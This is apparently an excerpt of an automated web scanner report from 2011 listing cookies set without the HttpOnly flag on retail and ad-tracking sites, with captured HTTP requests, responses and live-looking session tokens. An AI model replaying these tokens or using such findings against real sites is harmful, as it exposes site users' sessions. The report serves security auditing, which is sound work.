Date: Mon, 16 May 2011 10:35:41 GMT
Set-Cookie: TS657dfa=ae893fcd6f83db1d4dcea9b7b38a4764e754034066e5db8e4dd0fdfd60ac0ec569d69bc7; Path=/
Content-Length: 143902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...

13.38. http://www.footlocker.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.footlocker.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
SSLC=web%2D22;domain=.footlocker.com;path=/
USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kvNzcq7EhhaxwicsoNK5tEHcjE3%0AYFDrCAOfSiDaoXvuilQ%2FxCMBrPOPNx8buPyL9lx0NzqsjNz0q4kL6gSipJbM8SiVTyaUlrgEsJFe%0AR0Pt4%2BMEOSoTJQWYIpa4nKSm4viwlCWT1JV2V7KDGygnmWiNg1zAOCJfoc2GfIzeW5%2FeSK5uXUOS%0AKuE8UK42iD0wQl31wi0YADO2S9yjp8izb9ei;expires=Wed, 08-May-2041 01:58:56 GMT;path=/
TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 01:58:56 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.39. http://www.footlocker.com/login/login.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.footlocker.com
Path:	/login/login.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
SSLC=web%2D06;domain=.footlocker.com;path=/
USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:26 GMT;path=/
TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:26 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.40. http://www.footlocker.com/login/login_forgotpassword.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.footlocker.com
Path:	/login/login_forgotpassword.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
SSLC=web%2D22;domain=.footlocker.com;path=/
USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:38 GMT;path=/
TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.41. http://www.footlocker.com/login/login_form.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.footlocker.com
Path:	/login/login_form.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQrJBvJgWGhaUcy748QcpFTksNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
SSLC=web%2D22;domain=.footlocker.com;path=/
USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kvNzcq7EhhaxwicsoNK5tEHcjE3%0AYFDrCAOfSiDaoXvuilQ%2FxCMBrPOPNx8buPyL9lx0NzqsjNz0q4kL6gSipJbM8SiVTyaUlrgEsJFe%0AR0Pt4%2BMEOSoTJQWYIpa4nKSm4viwlCWT1JV2V7KDGygnmWiNg1zAOCJfoc2GfIzeW5%2FeSK5uXUOS%0AKuE8UK42iD0wQl31wi0YADO2S9yjp8izb9ei;expires=Wed, 08-May-2041 10:57:50 GMT;path=/
NST=2011%2D05%2D16%2005%3A57%3A50;path=/
TID=5555%2D50161105572150050510308%2D0;expires=Sun, 14-Aug-2011 10:57:50 GMT;path=/
TRACK_USER_P=31155501611055750050572953;expires=Wed, 08-May-2041 10:57:50 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login/login_form.cfm HTTP/1.1
Host: www.footlocker.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

13.42. https://www.footlocker.com/account/default.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.footlocker.com
Path:	/account/default.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
SSLC=web%2D22;domain=.footlocker.com;path=/
USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:38 GMT;path=/
TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.43. https://www.footlocker.com/account/default/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.footlocker.com
Path:	/account/default/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
SSLC=web%2D14;domain=.footlocker.com;path=/
USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:41 GMT;path=/
TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:41 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.44. http://www.gnc.com/community/index.jsp%20%20 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.gnc.com
Path:	/community/index.jsp%20%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=f5hHNQ5YYHfFrLKw6fkW4j6LhJpz8ZYLdnCQyDkP3DhhtWxJ2d2l!1363466968; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/index.jsp%20%20 HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Referer: http://app.gnc.com/profile/profile.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; s_pers=%20s_nr%3D1305511477578%7C1308103477578%3B%20s_lastvisit%3D1305540969641%7C1400148969641%3B%20gpv_p6%3DMy%2520Account%253A%2520Sign-In%7C1305542769642%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DMy%25252520Account%2525253A%25252520Sign-In%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//app.gnc.com/profile/profile.cfm%252526ot%25253DA%3B

Response

13.45. http://www.helzberg.com/account.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.helzberg.com
Path:	/account.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=868bee483f5520321a592b5e01c3.helzberg-b2c-i4; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account.do?method=start HTTP/1.1
Host: www.helzberg.com
Proxy-Connection: keep-alive
Referer: http://www.helzberg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=67638cb10049a42429ba4a456b90.helzberg-b2c-i4; __utma=140079658.898159482.1305510047.1305510047.1305510047.1; __utmc=140079658; __utmz=140079658.1305510047.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); customer=none; basket=none; s_cc=true; fsr.s={"v":1,"rid":"1305510061756_802948","pv":3,"to":5,"c":"http://www.helzberg.com/","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1305511291580}; s_sq=mlhelzbprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.helzberg.com/account.do%25253Fmethod%25253Dstart%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www.helzberg.com/account/login.do?method=view
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Mon, 16 May 2011 10:45:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:45:04 GMT
Connection: close
Set-Cookie: JSESSIONID=868bee483f5520321a592b5e01c3.helzberg-b2c-i4; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Set-Cookie: customer=none; Expires=Wed, 29-May-2013 10:45:04 GMT; Path=/
Set-Cookie: basket=none; Expires=Mon, 30-May-2011 10:45:04 GMT; Path=/
Content-Length: 0

13.46. http://www.linkedin.com/companyInsider previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.linkedin.com
Path:	/companyInsider

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

leo_auth_token="GST:ZpPi5xXPu3wAUyoFmEPiRoFWLLVIhVePrpPMOWXudLVqstNpbsiqk6:1305541361:db371bb2e2f7f4cf87c484a45d4fcbd618246dc6"; Version=1; Max-Age=1799; Expires=Mon, 16-May-2011 10:52:40 GMT; Path=/
s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
JSESSIONID="ajax:4068959828274013740"; Version=1; Path=/
lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.47. https://www.petsmart.com/coreg/index.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.petsmart.com
Path:	/coreg/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=5JXxNQ5K9p3LZsnG14q6zz517GQ0xcpK91crYtzNG9wMRphdmYgz!-1124203437; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.48. http://www.restorationhardware.com/my-account/sign-in.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.restorationhardware.com
Path:	/my-account/sign-in.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; Path=/
TS1c138a=5172be2c2b30d380a33b6207078d71312efa223a5124b4964dd08c16; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /my-account/sign-in.jsp?link=topnav_signin HTTP/1.1
Host: www.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/content/promo.jsp?id=138040&&link=SFGalleryStore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757}; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511164164

Response

HTTP/1.1 302 Moved Temporarily
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Location: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Mon, 16 May 2011 02:09:50 GMT
Connection: close
Set-Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; Path=/
Set-Cookie: TS1c138a=5172be2c2b30d380a33b6207078d71312efa223a5124b4964dd08c16; Path=/
Cache-Control: max-age=86400
Expires: Tue, 17 May 2011 02:09:49 GMT

13.49. https://www.restorationhardware.com/sitewide/includes/header/search.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.restorationhardware.com
Path:	/sitewide/includes/header/search.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; Path=/
TS1c138a=f0a5fd2add35545830b6a4f9fdab0b712efa223a5124b4964dd08c35; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.50. http://a.netmng.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

evo5=csmq4atf04cxa%7Co7sHAo0WiNAkV5aQXuATwLKnqcS7CiZMwsLzz4KjZ0u0qp3pkq8dEee9axkAPKMyKcjX7b%2Fj8u2pvMUKubOFmSXM7%2Bt0a6Ux23b%2BYSj08pAlornvRey34GAuBxIpydsc7XqPU6aRPmgH9%2FnsPER%2FdoRGgEVvdULoFhC9iH3sp31Vly6PXTxTMEfNAbPLdxsJgZThArgAu2FZdW2nOze9yxGDOI1muuzrVlGdOTN11V5CAWr3jbZbP%2FF39U8YDAxRZc6jF8SPBs2BGaJOfh52Yi4uav1ONnUmuw5m4GOxMErzgQqodDYqlk5V7GpMFF50jq1p9mFO%2BSMYIMzW0X2qY1bb0xTxY0WiV%2F05PStbeFKyfBPimlixNC1sOQBbQ3jEUFNFInZmY%2FCdeaP1REAfPTGTOBq3PsAoQ2Bd15zuYVt3hE%2BnRckFXgnwD2d8%2FOWdLYlMTkRkrg4XzCOJBw8F0TGKkTDwQxDH89mj%2FE24rfR9mqYMWMIDpv46H009GcZcooUqNc3iHid7BJ7%2BqsPj6hUcHS5wf1QjQ%2FsVI%2BkVsKU%3D; expires=Tue, 15-Nov-2011 02:01:04 GMT; path=/; domain=.netmng.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.51. http://a.rfihub.com/ca.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/ca.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

m="aAF25BkaA==AI20472990AAABL_aCnLI=AI20473163AAABL_aCVOI=AI20472990AAABL_Z4vn0=AI20472990AAABL_Z4bls=AI20473163AAABL_Z2OJY=";Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT
u="aAB7ilFUA==AI89bBrQ==AAABL_aCnLI=";Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT
f="aABTNDn0w==AK1305510033AB5AAABL_aCnLE=";Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.52. http://a.tribalfusion.com/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=a9nrejs2aFvDAJsbYZd7FMh2nQCFRDH0fa1otdZaZbc1scXdKPKEpkJfRWcSiSsMhXqubGvEyor; path=/; domain=.tribalfusion.com; expires=Sun, 14-Aug-2011 01:55:18 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.53. http://action.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://action.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

clid=2ll77mm01171voofy6a0tk1w02ezv00c3r0b0l0b50c; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
orblb=2ll8nk2031zw10u0200z2400yjk2gu10u0200z1q00yg11y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
rdrlst=4090spbll9m03000000063r060d6hll8nk20000000b3r0b0dlzll9l28000000073r0715ztll9l28000000073r0701hvll8nk20000000b3r0b16iell9m03000000063r0601g3ll8nk20000000b3r0b0msvll9m03000000063r060e6mll9m03000000063r06; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
sglst=2050s90ill9m03000me0063r060l06506dlell9l28000000073r070l075075msll9l28000000073r070l07507c24ll9l28000000073r070l075071jzll8nk200z2f00b3r0b0l0b50b; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02ezv00c3r0b0l0b50c; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Set-Cookie: orblb=2ll8nk2031zw10u0200z2400yjk2gu10u0200z1q00yg11y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000063r060d6hll8nk20000000b3r0b0dlzll9l28000000073r0715ztll9l28000000073r0701hvll8nk20000000b3r0b16iell9m03000000063r0601g3ll8nk20000000b3r0b0msvll9m03000000063r060e6mll9m03000000063r06; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000me0063r060l06506dlell9l28000000073r070l075075msll9l28000000073r070l07507c24ll9l28000000073r070l075071jzll8nk200z2f00b3r0b0l0b50b; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 16 May 2011 01:54:16 GMT

GIF89a.............!.......,...........D..;

13.54. http://ad.trafficmp.com/a/bpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.trafficmp.com
Path:	/a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

T_82oo=jd9%3Az8g%3A1; Domain=trafficmp.com; Expires=Tue, 15-May-2012 01:57:54 GMT; Path=/
rth=2-ll8nk2-jd9~z8g~1~1-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-; Domain=trafficmp.com; Expires=Tue, 15-May-2012 01:57:54 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.55. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!!e!!!?J!!!!$=!iJp!!(1-!!!!#=!iJp!!/GK!!!!#=!iJp!!/GR!!!!#=!iJp!!/i,!!!!#=!i9E!!2)!!!!!#=!i9E!!4Rk!!!!#=!iBY!!<A!!!!!#=!iHg!!J<J!!!!$=!iJp!!J<K!!!!$=!iJp!!J<S!!!!$=!iJp!!Kc5!!!!#=!Y*a!!OgU!!!!#=!i9E!!Z+p!!!!#=!c8X!!]lj!!!!#=!iHg!!i5*!!!!#=!iJN!!itb!!!!$=!iJp!!jB6!!!!#=!iK0!!rms!!!!#=!c8X!!t^6!!!!%=!Tiu!!u*$!!!!#=!iJG!!x<K!!!!#=!iR#!#$gc!!!!#=!iHg!#$k4!!!!#=!iHg!#*Xa!!!!#=!dNx!#+]S!!!!#=!i9E!#4^h!!!!#=!dNx!#6Ty!!!!#=!dNx!#8>+!!!!#=!i9S!#:<o!!!!#=!iJ:!#C@M!!!!#=!iK@!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTH!!!!$=!iJp!#MTI!!!!$=!iJp!#MTJ!!!!$=!iJp!#Mu_!!!!#=!eq^!#Nyi!!!!#=!eq^!#QfM!!!!#=!eq^!#SV*!!!!#=!i9E!#Sub!!!!#=!dNx!#Tw/!!!!#=!eq^!#UDQ!!!!$=!iJp!#UW*!!!!#=!dNx!#XV)!!!!#=!dNx!#XjF!!!!#=!eq^!#]<e!!!!#=!iHj!#^0%!!!!#=!i9E!#a]3!!!!#=!iJT!#b?f!!!!#=!iHc!#b?y!!!!#=!dNx!#biv!!!!#=!iK0!#dCX!!!!%=!c>6!#e9?!!!!#=!dNx!#g/7!!!!#=!i9E!#pI<!!!!#=!iHj!#q4c!!!!#=!iHl!#qVJ!!!!#=!eq^!#r-[!!!!#=!c8Z!$(Z`!!!!#=!iJp!$)ZR!!!!#=!i9S!$,gE!!!!$=!iQt"; path=/; expires=Wed, 15-May-2013 01:53:56 GMT
BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=601754&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
